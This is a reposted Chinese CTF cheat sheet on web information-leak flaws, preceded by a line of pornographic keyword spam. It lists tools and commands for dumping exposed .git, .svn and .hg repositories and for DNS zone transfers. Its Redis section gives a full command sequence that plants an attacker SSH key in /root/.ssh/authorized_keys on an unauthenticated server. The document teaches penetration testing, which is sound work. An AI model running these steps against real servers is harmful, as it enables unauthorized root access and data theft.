日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 综合教程 >内容正文

综合教程

CTF之信息泄漏

發(fā)布時間:2023/12/31 综合教程 29 生活家
生活随笔 收集整理的這篇文章主要介紹了 CTF之信息泄漏 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

web源碼泄漏

.hg源碼泄漏:

漏洞成因:hg init的時候會生成.hg,http://www.xx.com/.hg/,

工具:dvcs-ripper,(rip-hg.pl -v -u http://www.xx.com/.hg/)

.git源碼泄漏:

漏洞成因:在運行g(shù)it init初始化代碼庫的時候,會在當前目錄下產(chǎn)生一個.git的隱藏文件,用來記錄代碼的變更記錄等,沒有刪除這個文件,導致泄漏,http://www.xxx.com/.git/config

工具:GitHack,dvcs-ripper,(GitHack.py http://www.xxx.com/.git,rip-hg.pl -v -u http://www.xx.com/.git/)

.DS_Store源碼泄漏:

漏洞成因:在發(fā)布代碼時,沒有刪除文件夾中隱藏的.DS_store,被發(fā)現(xiàn)后,獲取了敏感的文件名等信息,http://www.xxx.com/.ds_store

工具:dsstoreexp,(python ds_store_exp.py http://www.xxx.com/.DS_Store)

網(wǎng)站備份壓縮文件:

在網(wǎng)站的使用過程中,往往需要對網(wǎng)站中的文件進行修改,升級,此時就需要對網(wǎng)站整或其中某一頁面進行備份,當備份文件或修改過程中的緩存文件因為各種原因被留在網(wǎng)站web目錄下,而該目錄又沒有設置訪問權(quán)限,就有可能導致備份文件被下載,導致信息泄漏,給服務器安全埋下隱患。.rar, .zip, .7z, .tar.gz, .bak, .swp, .txt, .html,

工具:可以使用一些掃描軟件,進行掃描,如awvs之類的

像.swp文件,就是vim源文件泄漏,/.index.php.swp或/index.php~ 可以直接用vim -r inde.php來讀取文件

SVN導致文件泄漏:

版本控制系統(tǒng)

工具:dvcs-ripper,Seay-Svn,(rip-svn.pl -v -u http://www.xxx.com/.svn/)

應用層泄漏

DNS域傳送:

dns服務器的主備數(shù)據(jù)同步,使用的是域傳送功能,如果使用默認配置文件進行配置,就會存在dns域傳送漏洞(不手動添加allow-transfer)

工具:dig @1.1.1.1 xxx.com axfr (會泄漏一些信息)

HeartBleed:

利用https

從堆棧錯誤泄漏到RCE:

利用報錯,泄漏信息,利用函數(shù)try{....}catche(e){e.printstack;}

未授權(quán)訪問漏洞:

未授權(quán)訪問----應用層服務的問題,服務啟動后,沒配置任何憑證,導致可以直接進入

弱口令---配置的密碼過于簡單常見

空口令---沒配置密碼

目前主要存在未授權(quán)訪問漏洞的如下:

NFS,Samba,LDAP,Rsync,F(xiàn)TP,Gitlab,Jenkins,MongoDB,Redis,ZooKeeper,

ElasticSearch,Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo等,這些都是挖礦勒索的高發(fā)地帶

如:

redis為授權(quán)訪問漏洞,默認情況下會綁定在0.0.0.0:6379,這樣會將redis服務暴露到公網(wǎng)上,如果沒有開啟認證的情況下,可以導致任意用戶可以訪問目標服務器,可以利用相關方法,在redis服務器上寫入公鑰,進而可以使用對應私鑰直接登陸目標服務器。

1.本地生成公鑰私鑰

ssh-keygen -t rsa

2.把公鑰寫入xx.txt文件

(echo -e "

";cat id_rsa.pub;echo -e "

") > xx.txt

3.連接redis寫入文件

cat xx.txt | redis-cli -h 192.168.1.2 -x set crackit

redis-cli -h 192.168.1.2

192.168.1.2:6379> config set dir /root/.ssh/

192.168.1.2:6379> config get dir

1)"dir"

2)"/root/.ssh"

192.168.1.2:6379> config set dbfilename "authorized_keys"

192.168.1.2"6379> save

也可以使用msf里面成熟的exp來利用

友情鏈接 http://www.cnblogs.com/klionsec

http://www.cnblogs.com/l0cm

http://www.cnblogs.com/Anonyaptxxx

http://www.feiyusafe.cn

總結(jié)

以上是生活随笔為你收集整理的CTF之信息泄漏的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。